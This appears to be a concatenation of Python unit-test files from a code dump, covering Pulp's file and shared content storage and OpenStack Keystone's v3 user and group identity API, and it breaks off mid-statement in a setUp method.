| bit-trade-one/SoundModuleAP | lib-src/lv2/sratom/waflib/Scripting.py | Python | gpl-2.0 | 10,970 |
import os
from errno import EEXIST, EPERM
from unittest import TestCase
from mock import Mock, patch
from pulp.server.content.storage import mkdir, ContentStorage, FileStorage, SharedStorage
class TestMkdir(TestCase):
    """Tests for the mkdir() helper, which tolerates 'already exists' errors."""

    @patch('os.makedirs')
    def test_succeeded(self, _mkdir):
        # Plain success: mkdir delegates to os.makedirs exactly once.
        path = 'path-123'
        mkdir(path)
        _mkdir.assert_called_once_with(path)

    @patch('os.makedirs')
    def test_already_exists(self, _mkdir):
        # EEXIST must be swallowed.  Fix: the side_effect has to be installed
        # *before* calling mkdir(); the original test set it afterwards, so
        # the error path was never exercised.
        path = 'path-123'
        _mkdir.side_effect = OSError(EEXIST, path)
        mkdir(path)
        _mkdir.assert_called_once_with(path)

    @patch('os.makedirs')
    def test_other_exception(self, _mkdir):
        # Any other errno must propagate.  Fix: the original test first called
        # mkdir() before installing the side_effect, which proved nothing and
        # left a spurious extra call on the mock.
        path = 'path-123'
        _mkdir.side_effect = OSError(EPERM, path)
        self.assertRaises(OSError, mkdir, path)
class TestContentStorage(TestCase):
    """Tests for the abstract ContentStorage base class."""

    def test_abstract(self):
        # put() and get() are abstract and must raise NotImplementedError.
        storage = ContentStorage()
        self.assertRaises(NotImplementedError, storage.put, None, None)
        self.assertRaises(NotImplementedError, storage.get, None)

    def test_open(self):
        # open() is a no-op hook on the base class.
        ContentStorage().open()

    def test_close(self):
        # close() is a no-op hook on the base class.
        ContentStorage().close()

    def test_enter(self):
        # __enter__ opens the storage and returns it.
        storage = ContentStorage()
        storage.open = Mock()
        returned = storage.__enter__()
        storage.open.assert_called_once_with()
        self.assertEqual(returned, storage)

    def test_exit(self):
        # __exit__ closes the storage.
        storage = ContentStorage()
        storage.close = Mock()
        storage.__exit__()
        storage.close.assert_called_once_with()
class TestFileStorage(TestCase):
    """Tests for FileStorage: units are copied under
    <storage_dir>/content/units/<unit_type_id>/<id[0:4]>/<id>.
    """
    # NOTE: mock decorators apply bottom-up; the os.path.isdir patch supplies
    # its own Mock (injects no argument), so 'config' is the first injected
    # argument and 'shutil' the second.
    @patch('pulp.server.content.storage.shutil')
    @patch('pulp.server.content.storage.config')
    @patch('os.path.isdir', Mock(return_value=True))
    def test_put_dir(self, config, shutil):
        # isdir patched True: directory content goes through shutil.copytree.
        path_in = '/tmp/test/'
        storage_dir = '/tmp/storage'
        unit = Mock(id='0123456789', unit_type_id='ABC')
        # Stub the [server] storage_dir configuration lookup.
        config.get = lambda s, p: {'server': {'storage_dir': storage_dir}}[s][p]
        storage = FileStorage()
        # test
        storage.put(unit, path_in)
        # validation
        destination = os.path.join(
            os.path.join(storage_dir, 'content', 'units', unit.unit_type_id),
            unit.id[0:4], unit.id)
        shutil.copytree.assert_called_once_with(path_in, destination)
        self.assertEqual(unit.storage_path, destination)
    @patch('pulp.server.content.storage.shutil')
    @patch('pulp.server.content.storage.config')
    @patch('os.path.isdir', Mock(return_value=False))
    def test_put_file(self, config, shutil):
        # isdir patched False: plain files go through shutil.copy.
        path_in = '/tmp/test'
        storage_dir = '/tmp/storage'
        unit = Mock(id='0123456789', unit_type_id='ABC')
        config.get = lambda s, p: {'server': {'storage_dir': storage_dir}}[s][p]
        storage = FileStorage()
        # test
        storage.put(unit, path_in)
        # validation
        destination = os.path.join(
            os.path.join(storage_dir, 'content', 'units', unit.unit_type_id),
            unit.id[0:4], unit.id)
        shutil.copy.assert_called_once_with(path_in, destination)
        self.assertEqual(unit.storage_path, destination)
    def test_get(self):
        # get() is a no-op on FileStorage; exercised for coverage only.
        storage = FileStorage()
        storage.get(None)  # just for coverage
class TestSharedStorage(TestCase):
    """Tests for SharedStorage: content shared between units, addressed by
    sha256(storage_id), with per-unit symlinks created under links_dir.
    """
    @patch('pulp.server.content.storage.sha256')
    def test_init(self, sha256):
        # The storage id is hashed; the provider is stored verbatim.
        provider = 'git'
        storage_id = '1234'
        storage = SharedStorage(provider, storage_id)
        sha256.assert_called_once_with(storage_id)
        self.assertEqual(storage.storage_id, sha256.return_value.hexdigest.return_value)
        self.assertEqual(storage.provider, provider)
    @patch('pulp.server.content.storage.mkdir')
    @patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
    @patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
    def test_open(self, _mkdir):
        # open() must create the content directory, then the links directory.
        storage = SharedStorage('git', '1234')
        storage.open()
        self.assertEqual(
            _mkdir.call_args_list,
            [
                ((storage.content_dir,), {}),
                ((storage.links_dir,), {}),
            ])
    @patch('pulp.server.content.storage.config')
    def test_shared_dir(self, config):
        # shared_dir is <storage_dir>/content/shared/<provider>/<storage_id>.
        storage_dir = '/tmp/storage'
        config.get = lambda s, p: {'server': {'storage_dir': storage_dir}}[s][p]
        storage = SharedStorage('git', '1234')
        self.assertEqual(
            storage.shared_dir,
            os.path.join(storage_dir, 'content', 'shared', storage.provider, storage.storage_id))
    @patch('pulp.server.content.storage.SharedStorage.shared_dir', 'abcd/')
    def test_content_dir(self):
        # content_dir hangs off shared_dir.
        storage = SharedStorage('git', '1234')
        self.assertEqual(
            storage.content_dir,
            os.path.join(storage.shared_dir, 'content'))
    @patch('pulp.server.content.storage.SharedStorage.shared_dir', 'abcd/')
    def test_links_dir(self):
        # links_dir hangs off shared_dir.
        storage = SharedStorage('git', '1234')
        self.assertEqual(
            storage.links_dir,
            os.path.join(storage.shared_dir, 'links'))
    def test_put(self):
        # put() on shared storage only creates the unit symlink.
        unit = Mock()
        storage = SharedStorage('git', '1234')
        storage.link = Mock()
        storage.put(unit)
        storage.link.assert_called_once_with(unit)
    def test_get(self):
        # get() is a no-op on SharedStorage; exercised for coverage only.
        storage = SharedStorage('git', '1234')
        storage.get(None)  # just for coverage
    @patch('os.symlink')
    @patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
    @patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
    def test_link(self, symlink):
        # link() creates links_dir/<unit.id> -> content_dir and records it
        # as the unit's storage_path.
        unit = Mock(id='0123456789')
        storage = SharedStorage('git', '1234')
        # test
        storage.link(unit)
        # validation
        expected_path = os.path.join(storage.links_dir, unit.id)
        symlink.assert_called_once_with(storage.content_dir, expected_path)
        self.assertEqual(unit.storage_path, expected_path)
    @patch('os.symlink')
    @patch('os.readlink')
    @patch('os.path.islink')
    @patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
    @patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
    def test_duplicate_link(self, islink, readlink, symlink):
        # EEXIST is tolerated when the existing path is already a symlink
        # pointing at content_dir.
        unit = Mock(id='0123456789')
        storage = SharedStorage('git', '1234')
        islink.return_value = True
        symlink.side_effect = OSError()
        symlink.side_effect.errno = EEXIST
        readlink.return_value = storage.content_dir
        # test
        storage.link(unit)
        # note: no exception raised
        # validation
        expected_path = os.path.join(storage.links_dir, unit.id)
        symlink.assert_called_once_with(storage.content_dir, expected_path)
        self.assertEqual(unit.storage_path, expected_path)
    @patch('os.symlink')
    @patch('os.readlink')
    @patch('os.path.islink')
    @patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
    @patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
    def test_duplicate_nonlink(self, islink, readlink, symlink):
        # EEXIST must propagate when the existing path is NOT a symlink.
        unit = Mock(id='0123456789')
        storage = SharedStorage('git', '1234')
        islink.return_value = False  # not a link
        symlink.side_effect = OSError()
        symlink.side_effect.errno = EEXIST
        readlink.return_value = storage.content_dir
        # test
        self.assertRaises(OSError, storage.link, unit)
        # validation
        expected_path = os.path.join(storage.links_dir, unit.id)
        symlink.assert_called_once_with(storage.content_dir, expected_path)
    @patch('os.symlink')
    @patch('os.readlink')
    @patch('os.path.islink')
    @patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
    @patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
    def test_different_link_target(self, islink, readlink, symlink):
        # EEXIST must propagate when the existing link points elsewhere.
        unit = Mock(id='0123456789')
        storage = SharedStorage('git', '1234')
        islink.return_value = True
        symlink.side_effect = OSError()
        symlink.side_effect.errno = EEXIST
        readlink.return_value = 'different link target'
        # test
        self.assertRaises(OSError, storage.link, unit)
        # validation
        expected_path = os.path.join(storage.links_dir, unit.id)
        symlink.assert_called_once_with(storage.content_dir, expected_path)
    @patch('os.symlink')
    @patch('pulp.server.content.storage.SharedStorage.content_dir', 'abcd/')
    @patch('pulp.server.content.storage.SharedStorage.links_dir', 'xyz/')
    def test_link_failed(self, symlink):
        # Non-EEXIST errors from os.symlink must propagate.
        unit = Mock(id='0123456789')
        storage = SharedStorage('git', '1234')
        symlink.side_effect = OSError()
        symlink.side_effect.errno = EPERM
        self.assertRaises(OSError, storage.link, unit)
| mibanescu/pulp | server/test/unit/server/content/test_storage.py | Python | gpl-2.0 | 8,916 |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import fixtures
import mock
from oslo_log import log
from six.moves import http_client
from testtools import matchers
from keystone.common import controller
import keystone.conf
from keystone import exception
from keystone.tests import unit
from keystone.tests.unit import test_v3
CONF = keystone.conf.CONF
# NOTE(morganfainberg): To be removed when admin_token_auth middleware is
# removed. This was moved to it's own testcase so it can setup the
# admin_token_auth pipeline without impacting other tests.
class IdentityTestCaseStaticAdminToken(test_v3.RestfulTestCase):
    """Identity tests that authenticate with the static bootstrap admin token."""
    EXTENSION_TO_ADD = 'admin_token_auth'
    def config_overrides(self):
        # Pin the static token value so the tests below can send it directly.
        super(IdentityTestCaseStaticAdminToken, self).config_overrides()
        self.config_fixture.config(
            admin_token='ADMIN')
    def test_list_users_with_static_admin_token_and_multiple_backends(self):
        # domain-specific operations with the bootstrap ADMIN token is
        # disallowed when domain-specific drivers are enabled
        self.config_fixture.config(group='identity',
                                   domain_specific_drivers_enabled=True)
        self.get('/users', token=CONF.admin_token,
                 expected_status=exception.Unauthorized.code)
    def test_create_user_with_admin_token_and_no_domain(self):
        """Call ``POST /users`` with admin token but no domain id.
        It should not be possible to use the admin token to create a user
        while not explicitly passing the domain in the request body.
        """
        # Passing a valid domain id to new_user_ref() since domain_id is
        # not an optional parameter.
        ref = unit.new_user_ref(domain_id=self.domain_id)
        # Delete the domain id before sending the request.
        del ref['domain_id']
        self.post('/users', body={'user': ref}, token=CONF.admin_token,
                  expected_status=http_client.BAD_REQUEST)
class IdentityTestCase(test_v3.RestfulTestCase):
"""Test users and groups."""
    def setUp(self):
        # Create a group and a credential owned by the default test user so
        # the individual tests below have fixtures to operate on.
        super(IdentityTestCase, self).setUp()
        self.group = unit.new_group_ref(domain_id=self.domain_id)
        self.group = self.identity_api.create_group(self.group)
        self.group_id = self.group['id']
        self.credential = unit.new_credential_ref(
            user_id=self.user['id'],
            project_id=self.project_id)
        self.credential_api.create_credential(self.credential['id'],
                                              self.credential)
# user crud tests
def test_create_user(self):
"""Call ``POST /users``."""
ref = unit.new_user_ref(domain_id=self.domain_id)
r = self.post(
'/users',
body={'user': ref})
return self.assertValidUserResponse(r, ref)
    def test_create_user_without_domain(self):
        """Call ``POST /users`` without specifying domain.
        According to the identity-api specification, if you do not
        explicitly specify the domain_id in the entity, it should
        take the domain scope of the token as the domain_id.
        """
        # Create a user with a role on the domain so we can get a
        # domain scoped token
        domain = unit.new_domain_ref()
        self.resource_api.create_domain(domain['id'], domain)
        user = unit.create_user(self.identity_api, domain_id=domain['id'])
        self.assignment_api.create_grant(
            role_id=self.role_id, user_id=user['id'],
            domain_id=domain['id'])
        # Build a reference without a domain_id and post it with a
        # domain-scoped token: the token's domain should be applied.
        ref = unit.new_user_ref(domain_id=domain['id'])
        ref_nd = ref.copy()
        ref_nd.pop('domain_id')
        auth = self.build_authentication_request(
            user_id=user['id'],
            password=user['password'],
            domain_id=domain['id'])
        r = self.post('/users', body={'user': ref_nd}, auth=auth)
        self.assertValidUserResponse(r, ref)
        # Now try the same thing without a domain token - which should fail
        ref = unit.new_user_ref(domain_id=domain['id'])
        ref_nd = ref.copy()
        ref_nd.pop('domain_id')
        auth = self.build_authentication_request(
            user_id=self.user['id'],
            password=self.user['password'],
            project_id=self.project['id'])
        # TODO(henry-nash): Due to bug #1283539 we currently automatically
        # use the default domain_id if a domain scoped token is not being
        # used. For now we just check that a deprecation warning has been
        # issued. Change the code below to expect a failure once this bug is
        # fixed.
        with mock.patch(
                'oslo_log.versionutils.report_deprecated_feature') as mock_dep:
            r = self.post('/users', body={'user': ref_nd}, auth=auth)
            self.assertTrue(mock_dep.called)
        ref['domain_id'] = CONF.identity.default_domain_id
        return self.assertValidUserResponse(r, ref)
def test_create_user_with_admin_token_and_domain(self):
"""Call ``POST /users`` with admin token and domain id."""
ref = unit.new_user_ref(domain_id=self.domain_id)
self.post('/users', body={'user': ref}, token=self.get_admin_token(),
expected_status=http_client.CREATED)
    def test_user_management_normalized_keys(self):
        """Illustrate the inconsistent handling of hyphens in keys.
        To quote Morgan in bug 1526244:
            the reason this is converted from "domain-id" to "domain_id" is
            because of how we process/normalize data. The way we have to handle
            specific data types for known columns requires avoiding "-" in the
            actual python code since "-" is not valid for attributes in python
            w/o significant use of "getattr" etc.
            In short, historically we handle some things in conversions. The
            use of "extras" has long been a poor design choice that leads to
            odd/strange inconsistent behaviors because of other choices made in
            handling data from within the body. (In many cases we convert from
            "-" to "_" throughout openstack)
        Source: https://bugs.launchpad.net/keystone/+bug/1526244/comments/9
        """
        # Create two domains to work with.
        domain1 = unit.new_domain_ref()
        self.resource_api.create_domain(domain1['id'], domain1)
        domain2 = unit.new_domain_ref()
        self.resource_api.create_domain(domain2['id'], domain2)
        # We can successfully create a normal user without any surprises.
        user = unit.new_user_ref(domain_id=domain1['id'])
        r = self.post(
            '/users',
            body={'user': user})
        self.assertValidUserResponse(r, user)
        user['id'] = r.json['user']['id']
        # Query strings are not normalized: so we get all users back (like
        # self.user), not just the ones in the specified domain.
        r = self.get(
            '/users?domain-id=%s' % domain1['id'])
        self.assertValidUserListResponse(r, ref=self.user)
        self.assertNotEqual(domain1['id'], self.user['domain_id'])
        # When creating a new user, if we move the 'domain_id' into the
        # 'domain-id' attribute, the server will normalize the request
        # attribute, and effectively "move it back" for us.
        user = unit.new_user_ref(domain_id=domain1['id'])
        user['domain-id'] = user.pop('domain_id')
        r = self.post(
            '/users',
            body={'user': user})
        self.assertNotIn('domain-id', r.json['user'])
        self.assertEqual(domain1['id'], r.json['user']['domain_id'])
        # (move this attribute back so we can use assertValidUserResponse)
        user['domain_id'] = user.pop('domain-id')
        self.assertValidUserResponse(r, user)
        user['id'] = r.json['user']['id']
        # If we try updating the user's 'domain_id' by specifying a
        # 'domain-id', then it'll be stored into extras rather than normalized,
        # and the user's actual 'domain_id' is not affected.
        # (the response echoes back the unknown 'domain-id' key verbatim while
        # 'domain_id' keeps its original value)
        r = self.patch(
            '/users/%s' % user['id'],
            body={'user': {'domain-id': domain2['id']}})
        self.assertEqual(domain2['id'], r.json['user']['domain-id'])
        self.assertEqual(user['domain_id'], r.json['user']['domain_id'])
        self.assertNotEqual(domain2['id'], user['domain_id'])
        self.assertValidUserResponse(r, user)
def test_create_user_bad_request(self):
"""Call ``POST /users``."""
self.post('/users', body={'user': {}},
expected_status=http_client.BAD_REQUEST)
def test_create_user_bad_domain_id(self):
"""Call ``POST /users``."""
# create user with 'DEFaUlT' domain_id instead if 'default'
# and verify it fails
self.post('/users',
body={'user': {"name": "baddomain", "domain_id":
"DEFaUlT"}},
expected_status=http_client.NOT_FOUND)
def test_list_head_users(self):
"""Call ``GET & HEAD /users``."""
resource_url = '/users'
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=self.user,
resource_url=resource_url)
self.head(resource_url, expected_status=http_client.OK)
    def test_list_users_with_multiple_backends(self):
        """Call ``GET /users`` when multiple backends is enabled.
        In this scenario, the controller requires a domain to be specified
        either as a filter or by using a domain scoped token.
        """
        # Enabling domain-specific drivers is what forces the domain-scoping
        # requirement exercised below.
        self.config_fixture.config(group='identity',
                                   domain_specific_drivers_enabled=True)
        # Create a new domain with a new project and user
        domain = unit.new_domain_ref()
        self.resource_api.create_domain(domain['id'], domain)
        project = unit.new_project_ref(domain_id=domain['id'])
        self.resource_api.create_project(project['id'], project)
        user = unit.create_user(self.identity_api, domain_id=domain['id'])
        # Create both project and domain role grants for the user so we
        # can get both project and domain scoped tokens
        self.assignment_api.create_grant(
            role_id=self.role_id, user_id=user['id'],
            domain_id=domain['id'])
        self.assignment_api.create_grant(
            role_id=self.role_id, user_id=user['id'],
            project_id=project['id'])
        dom_auth = self.build_authentication_request(
            user_id=user['id'],
            password=user['password'],
            domain_id=domain['id'])
        project_auth = self.build_authentication_request(
            user_id=user['id'],
            password=user['password'],
            project_id=project['id'])
        # First try using a domain scoped token
        resource_url = '/users'
        r = self.get(resource_url, auth=dom_auth)
        self.assertValidUserListResponse(r, ref=user,
                                         resource_url=resource_url)
        # Now try using a project scoped token
        resource_url = '/users'
        r = self.get(resource_url, auth=project_auth)
        self.assertValidUserListResponse(r, ref=user,
                                         resource_url=resource_url)
        # Now try with an explicit filter
        resource_url = ('/users?domain_id=%(domain_id)s' %
                        {'domain_id': domain['id']})
        r = self.get(resource_url)
        self.assertValidUserListResponse(r, ref=user,
                                         resource_url=resource_url)
def test_list_users_no_default_project(self):
"""Call ``GET /users`` making sure no default_project_id."""
user = unit.new_user_ref(self.domain_id)
user = self.identity_api.create_user(user)
resource_url = '/users'
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=user,
resource_url=resource_url)
def test_get_head_user(self):
"""Call ``GET & HEAD /users/{user_id}``."""
resource_url = '/users/%(user_id)s' % {
'user_id': self.user['id']}
r = self.get(resource_url)
self.assertValidUserResponse(r, self.user)
self.head(resource_url, expected_status=http_client.OK)
    def test_get_user_does_not_include_extra_attributes(self):
        """Call ``GET /users/{user_id}`` extra attributes are not included."""
        user = unit.new_user_ref(domain_id=self.domain_id,
                                 project_id=self.project_id)
        user = self.identity_api.create_user(user)
        # created_at / last_active_at must not leak into the returned ref.
        self.assertNotIn('created_at', user)
        self.assertNotIn('last_active_at', user)
        r = self.get('/users/%(user_id)s' % {'user_id': user['id']})
        self.assertValidUserResponse(r, user)
def test_get_user_with_default_project(self):
"""Call ``GET /users/{user_id}`` making sure of default_project_id."""
user = unit.new_user_ref(domain_id=self.domain_id,
project_id=self.project_id)
user = self.identity_api.create_user(user)
r = self.get('/users/%(user_id)s' % {'user_id': user['id']})
self.assertValidUserResponse(r, user)
def test_add_user_to_group(self):
"""Call ``PUT /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
    def test_list_head_groups_for_user(self):
        """Call ``GET & HEAD /users/{user_id}/groups``."""
        # Two fresh users: user1 is added to self.group, user2 is not.
        user1 = unit.create_user(self.identity_api,
                                 domain_id=self.domain['id'])
        user2 = unit.create_user(self.identity_api,
                                 domain_id=self.domain['id'])
        self.put('/groups/%(group_id)s/users/%(user_id)s' % {
            'group_id': self.group_id, 'user_id': user1['id']})
        # Scenarios below are written to test the default policy configuration
        # One should be allowed to list one's own groups
        auth = self.build_authentication_request(
            user_id=user1['id'],
            password=user1['password'])
        resource_url = ('/users/%(user_id)s/groups' %
                        {'user_id': user1['id']})
        r = self.get(resource_url, auth=auth)
        self.assertValidGroupListResponse(r, ref=self.group,
                                          resource_url=resource_url)
        self.head(resource_url, auth=auth, expected_status=http_client.OK)
        # Administrator is allowed to list others' groups
        resource_url = ('/users/%(user_id)s/groups' %
                        {'user_id': user1['id']})
        r = self.get(resource_url)
        self.assertValidGroupListResponse(r, ref=self.group,
                                          resource_url=resource_url)
        self.head(resource_url, expected_status=http_client.OK)
        # Ordinary users should not be allowed to list other's groups
        auth = self.build_authentication_request(
            user_id=user2['id'],
            password=user2['password'])
        resource_url = '/users/%(user_id)s/groups' % {
            'user_id': user1['id']}
        self.get(resource_url, auth=auth,
                 expected_status=exception.ForbiddenAction.code)
        self.head(resource_url, auth=auth,
                  expected_status=exception.ForbiddenAction.code)
def test_check_user_in_group(self):
"""Call ``HEAD /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
self.head('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
def test_list_head_users_in_group(self):
"""Call ``GET & HEAD /groups/{group_id}/users``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
resource_url = ('/groups/%(group_id)s/users' %
{'group_id': self.group_id})
r = self.get(resource_url)
self.assertValidUserListResponse(r, ref=self.user,
resource_url=resource_url)
self.assertIn('/groups/%(group_id)s/users' % {
'group_id': self.group_id}, r.result['links']['self'])
self.head(resource_url, expected_status=http_client.OK)
def test_remove_user_from_group(self):
"""Call ``DELETE /groups/{group_id}/users/{user_id}``."""
self.put('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
self.delete('/groups/%(group_id)s/users/%(user_id)s' % {
'group_id': self.group_id, 'user_id': self.user['id']})
    def test_update_user(self):
        """Call ``PATCH /users/{user_id}``."""
        user = unit.new_user_ref(domain_id=self.domain_id)
        # The PATCH body must not carry an id; strip the generated one.
        del user['id']
        r = self.patch('/users/%(user_id)s' % {
            'user_id': self.user['id']},
            body={'user': user})
        self.assertValidUserResponse(r, user)
def test_admin_password_reset(self):
    """An administrative password reset invalidates old credentials."""
    # bootstrap a user as admin
    user_ref = unit.create_user(self.identity_api,
                                domain_id=self.domain['id'])
    # The original password authenticates before the reset.
    original_auth = self.build_authentication_request(
        user_id=user_ref['id'],
        password=user_ref['password'])
    resp = self.v3_create_token(original_auth)
    original_token = resp.headers.get('X-Subject-Token')
    # A token issued before the reset also authenticates.
    token_auth = self.build_authentication_request(token=original_token)
    self.v3_create_token(token_auth)
    # Reset the password administratively.
    replacement_password = uuid.uuid4().hex
    self.patch('/users/%s' % user_ref['id'],
               body={'user': {'password': replacement_password}})
    # The old password is rejected after the reset ...
    self.v3_create_token(original_auth,
                         expected_status=http_client.UNAUTHORIZED)
    # ... and the pre-reset token is gone as well.
    self.v3_create_token(token_auth,
                         expected_status=http_client.NOT_FOUND)
    # The new password authenticates.
    replacement_auth = self.build_authentication_request(
        user_id=user_ref['id'],
        password=replacement_password)
    self.v3_create_token(replacement_auth)
def test_update_user_domain_id(self):
    """Call ``PATCH /users/{user_id}`` with domain_id."""
    user = self.identity_api.create_user(
        unit.new_user_ref(domain_id=self.domain['id']))
    # While domain_id is immutable (the default), moving the user to
    # another domain is a validation error.
    user['domain_id'] = CONF.identity.default_domain_id
    self.patch('/users/%(user_id)s' % {'user_id': user['id']},
               body={'user': user},
               expected_status=exception.ValidationError.code)
    # Once immutability is switched off, the same update succeeds.
    self.config_fixture.config(domain_id_immutable=False)
    user['domain_id'] = self.domain['id']
    resp = self.patch('/users/%(user_id)s' % {'user_id': user['id']},
                      body={'user': user})
    self.assertValidUserResponse(resp, user)
def test_delete_user(self):
    """Call ``DELETE /users/{user_id}``.

    As well as making sure the delete succeeds, we ensure
    that any credentials that reference this user are
    also deleted, while other credentials are unaffected.
    In addition, no tokens should remain valid for this user.
    """
    # First check the credential for this user is present
    r = self.credential_api.get_credential(self.credential['id'])
    self.assertDictEqual(self.credential, r)
    # Create a second credential with a different user
    user2 = unit.new_user_ref(domain_id=self.domain['id'],
                              project_id=self.project['id'])
    user2 = self.identity_api.create_user(user2)
    credential2 = unit.new_credential_ref(user_id=user2['id'],
                                          project_id=self.project['id'])
    self.credential_api.create_credential(credential2['id'], credential2)
    # Create a token for this user which we can check later
    # gets deleted
    auth_data = self.build_authentication_request(
        user_id=self.user['id'],
        password=self.user['password'],
        project_id=self.project['id'])
    token = self.get_requested_token(auth_data)
    # Confirm token is valid for now
    self.head('/auth/tokens',
              headers={'X-Subject-Token': token},
              expected_status=http_client.OK)
    # Now delete the user
    self.delete('/users/%(user_id)s' % {
        'user_id': self.user['id']})
    # Deleting the user should have deleted any credentials
    # that reference this user
    self.assertRaises(exception.CredentialNotFound,
                      self.credential_api.get_credential,
                      self.credential['id'])
    # And no tokens should remain valid for the deleted user
    tokens = self.token_provider_api._persistence._list_tokens(
        self.user['id'])
    self.assertEqual(0, len(tokens))
    # But the credential for user2 is unaffected
    r = self.credential_api.get_credential(credential2['id'])
    self.assertDictEqual(credential2, r)
# group crud tests

def test_create_group(self):
    """Call ``POST /groups``."""
    # A freshly generated ref avoids tripping the duplicate-name check.
    group_ref = unit.new_group_ref(domain_id=self.domain_id)
    resp = self.post('/groups', body={'group': group_ref})
    return self.assertValidGroupResponse(resp, group_ref)
def test_create_group_bad_request(self):
    """Call ``POST /groups`` with an empty group payload."""
    empty_payload = {'group': {}}
    self.post('/groups', body=empty_payload,
              expected_status=http_client.BAD_REQUEST)
def test_list_head_groups(self):
    """Call ``GET & HEAD /groups``."""
    groups_url = '/groups'
    resp = self.get(groups_url)
    # The fixture group must appear in the unfiltered listing.
    self.assertValidGroupListResponse(resp, ref=self.group,
                                      resource_url=groups_url)
    self.head(groups_url, expected_status=http_client.OK)
def test_get_head_group(self):
    """Call ``GET & HEAD /groups/{group_id}``."""
    group_url = '/groups/%(group_id)s' % {'group_id': self.group_id}
    resp = self.get(group_url)
    self.assertValidGroupResponse(resp, self.group)
    self.head(group_url, expected_status=http_client.OK)
def test_update_group(self):
    """Call ``PATCH /groups/{group_id}``."""
    update_ref = unit.new_group_ref(domain_id=self.domain_id)
    # The id never travels in a PATCH body.
    del update_ref['id']
    resp = self.patch('/groups/%(group_id)s' % {'group_id': self.group_id},
                      body={'group': update_ref})
    self.assertValidGroupResponse(resp, update_ref)
def test_update_group_domain_id(self):
    """Call ``PATCH /groups/{group_id}`` with domain_id."""
    # Moving the group across domains fails while domain_id is
    # immutable (the default) ...
    self.group['domain_id'] = CONF.identity.default_domain_id
    self.patch('/groups/%(group_id)s' % {'group_id': self.group['id']},
               body={'group': self.group},
               expected_status=exception.ValidationError.code)
    # ... and succeeds once immutability is disabled.
    self.config_fixture.config(domain_id_immutable=False)
    self.group['domain_id'] = self.domain['id']
    resp = self.patch('/groups/%(group_id)s' % {'group_id': self.group['id']},
                      body={'group': self.group})
    self.assertValidGroupResponse(resp, self.group)
def test_delete_group(self):
    """Call ``DELETE /groups/{group_id}``."""
    group_url = '/groups/%(group_id)s' % {'group_id': self.group_id}
    self.delete(group_url)
def test_create_user_password_not_logged(self):
    """Creating a user must not leak the password into the logs."""
    # Capture everything down to DEBUG so no level can slip through.
    log_fix = self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
    user_ref = unit.new_user_ref(domain_id=self.domain_id)
    self.post('/users', body={'user': user_ref})
    self.assertNotIn(user_ref['password'], log_fix.output)
def test_update_password_not_logged(self):
    """An admin password reset must not leak either password to logs."""
    log_fix = self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
    # Bootstrap a user; its generated password must never be logged.
    user_ref = unit.create_user(self.identity_api,
                                domain_id=self.domain['id'])
    self.assertNotIn(user_ref['password'], log_fix.output)
    # Administrative reset; the new password must not be logged either.
    replacement_password = uuid.uuid4().hex
    self.patch('/users/%s' % user_ref['id'],
               body={'user': {'password': replacement_password}})
    self.assertNotIn(replacement_password, log_fix.output)
def test_setting_default_project_id_to_domain_failed(self):
    """Call ``POST and PATCH /users`` with default_project_id=domain_id.

    default_project_id must be validated when given: it may not point
    at a domain, not even at a project acting as a domain, because
    issuing project-scoped tokens for projects acting as domains has
    not been sorted out yet.  Once it is, this constraint can be
    relaxed.
    """
    # POST with default_project_id set to a domain id -> HTTP 400.
    user_ref = unit.new_user_ref(domain_id=self.domain_id,
                                 project_id=self.domain_id)
    self.post('/users', body={'user': user_ref}, token=CONF.admin_token,
              expected_status=http_client.BAD_REQUEST)
    # PATCH with default_project_id set to a domain id -> HTTP 400.
    update = {'default_project_id': self.domain_id}
    self.patch('/users/%(user_id)s' % {'user_id': self.user['id']},
               body={'user': update},
               token=CONF.admin_token,
               expected_status=http_client.BAD_REQUEST)
class IdentityV3toV2MethodsTestCase(unit.TestCase):
    """Test users V3 to V2 conversion methods."""

    def new_user_ref(self, **kwargs):
        """Construct a bare bones user ref.

        Omits all optional components.
        """
        ref = unit.new_user_ref(**kwargs)
        # description is already omitted
        del ref['email']
        del ref['enabled']
        del ref['password']
        return ref

    def setUp(self):
        super(IdentityV3toV2MethodsTestCase, self).setUp()
        self.load_backends()
        # All four fixture users share the same id/name so they can be
        # compared against the same expected dicts below.
        user_id = uuid.uuid4().hex
        project_id = uuid.uuid4().hex

        # User with only default_project_id in ref
        self.user1 = self.new_user_ref(
            id=user_id,
            name=user_id,
            project_id=project_id,
            domain_id=CONF.identity.default_domain_id)

        # User without default_project_id or tenantId in ref
        self.user2 = self.new_user_ref(
            id=user_id,
            name=user_id,
            domain_id=CONF.identity.default_domain_id)

        # User with both tenantId and default_project_id in ref
        self.user3 = self.new_user_ref(
            id=user_id,
            name=user_id,
            project_id=project_id,
            tenantId=project_id,
            domain_id=CONF.identity.default_domain_id)

        # User with only tenantId in ref
        self.user4 = self.new_user_ref(
